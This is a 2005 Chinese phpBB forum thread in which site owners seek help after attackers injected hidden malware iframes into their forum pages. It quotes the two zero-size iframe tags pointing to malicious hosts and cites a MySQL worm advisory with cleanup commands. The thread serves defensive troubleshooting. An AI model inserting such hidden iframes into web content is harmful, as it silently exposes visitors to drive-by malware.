第 1 頁 (共 3 頁)
[問題] 請教各位前輩,關於被放了木馬...
發表於 : 2005-06-10 12:07
由 AmuroSheu
小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教
●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:
http://www.afuro.holyou.net/phpbb/
昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思
,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....
經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="
http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="
http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改.....
謝謝各位耐心的看完這篇求救文!
發表於 : 2005-06-10 12:17
由 kp3011
直接到管理台有關版面的描述中將代碼移除
發表於 : 2005-06-10 12:19
由 AmuroSheu
原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!
發表於 : 2005-06-10 13:24
由 kp3011
AmuroSheu 寫:原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!
保持更新
發表於 : 2005-06-11 11:25
由 SimonLeung
問題解決了,先謝!!
我也有同一個問題
NOD也測到與樓主一模一樣的情況
但我卻找不到那兩句指令\r
網址:
http://www.ace-forum.net/
phpBB 2.0.15
發表於 : 2005-06-18 00:32
由 風中的雨
kp3011 寫:AmuroSheu 寫:原來如此,謝謝前輩解答!!只是不知道應該要怎麼去防範之後可能有的第二次,甚至多次被放上這些東西呢?謝謝前輩!!
保持更新
請問,已經是最近的版本2.0.15了
可是沒幾天就會被加入這些木馬指令,刪除後,隔沒幾天又出現\r
即使將論壇或資料庫換密碼,還是無法徹底改善
有方法可以阻擋嗎
發表於 : 2005-06-18 05:35
由 神川小羽
有裝哪些外掛? 列個清單說明一下吧。
發表於 : 2005-06-18 07:20
由 阿維
我朋友的phpBB 2.0.15他沒有安裝MOD也是三天兩頭中標
請問主機套件必須要更新到哪些版本才比較安全呢? (PHP、MySQL、GD2之類的套件)
發表於 : 2005-06-18 13:18
由 風中的雨
神川小羽 寫:有裝哪些外掛? 列個清單說明一下吧。
只有裝一個限制觀看會員列表和群組頁<加強版>的外掛
發表於 : 2005-06-18 13:31
由 神川小羽
主機的php版本會不會是4.3.10之前的版本?
你沒有說明你的主機相關的環境以及版本,我不是很能肯定耶\r
win平台的話,這也是有可能\r
事件通告:攻擊MySQL蠕蟲,專挑懶人密碼下手
2005/02/02
風險等級: 警戒狀態
摘 要: 一隻專門攻擊Windows平台上的SQL Server的蠕蟲 Spybot.ivq 近日讓設定懶人密碼的管理者頭痛了,這隻蠕蟲的感染方式是利用猜測MySQL的系統管理者密碼,猜出以後會上傳一個含 Spybot 病毒的UDF (User Defined Function) 的檔案到SQL Server上,並利用MySQL的漏洞來讓該病毒自動在受駭主機上執行,如此一來整個系統就會淪為駭客魚肉。
HiNet SOC近日發現國內已有不少用戶受駭,提醒在Windows平台的 MySQL Server 管理員注意以下解決措施:
1. 設定存取控制,禁止遠端以系統管理者權限登入\r
2. 管理者密碼勿使用易遭破解或長度過短的密碼\r
3. 系統定期更新弱點修補
目前這隻蠕蟲只對Windows上的 MySQL 產生影響,如果您不確定是否受駭,請依下列方法檢查:
1. 在資料庫中下指令:SELECT * FROM mysql.func;
2. 檢查使否含有檔名為 "app_result" 的UDF檔案
3. 檢查是否有其他非法的UDF檔案
如果有發現受駭,移除方法如下:
1. 在資料庫中下指令:DROP FUNCTION app_result;
2. 安裝防毒軟體作全系統掃毒或利用 趨勢科技線上掃毒 來清除病毒
發表於 : 2005-06-19 05:02
由 風中的雨
Apache 版本 1.3.33 (Unix)
MySQL 版本 4.0.24-standard
PHP 版本 4.3.11
PERL 版本 5.8.4
上述是主機使用的版本
Re: [問題] 請教各位前輩,關於被放了木馬...
發表於 : 2005-06-19 08:28
由 俊俊
AmuroSheu 寫:小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教
●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:
http://www.afuro.holyou.net/phpbb/
昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思
,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....
經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="
http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="
http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改.....
謝謝各位耐心的看完這篇求救文!
請問是不是我看錯了呢? 我到你的論壇看不到有
<iframe src="
http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>之類的html出現
發表於 : 2005-06-19 10:35
由 阿維
抱歉,因為我那個朋友之前沒有給我主機套件資料,現在我已經拿到了
代碼: 選擇全部
Apache 版本 1.3.33 (Unix)
MySQL 版本 4.0.22-standard
PHP 版本 4.3.10
PHP 資訊 按這查看
PERL 版本 5.8.3
Kernel 版本 2.4.22-1.2199.nptlsmp
Cpanel 版本 10.2.0-STABLE-83
發表於 : 2005-06-19 16:41
由 神川小羽
問個問題唷,當你們處裡掉被植入的崁入視窗之後,有沒有發現"不該存在"的檔案
通常(中這支標的會這樣啦)後台的左視窗會怪怪的
首先下載一個全新的phpbb,然後解壓縮,用全新的檔案跟你自己的檔案比對
看看有沒有,不同檔案名稱的檔案
尤其是在admin資料夾裡面,可能會多出3~4個檔案,打開來看可以發現\r
這些程式中,有簡體的注解,記憶中(上次有幫人處裡這麻煩的問題)有一個是單存的表單\r
ㄧ個是用來上傳檔案的程式,還有一個是用來執行sql的程式。
發表於 : 2005-06-20 00:53
由 風中的雨
我查過了
admin裡並沒有多出來的檔案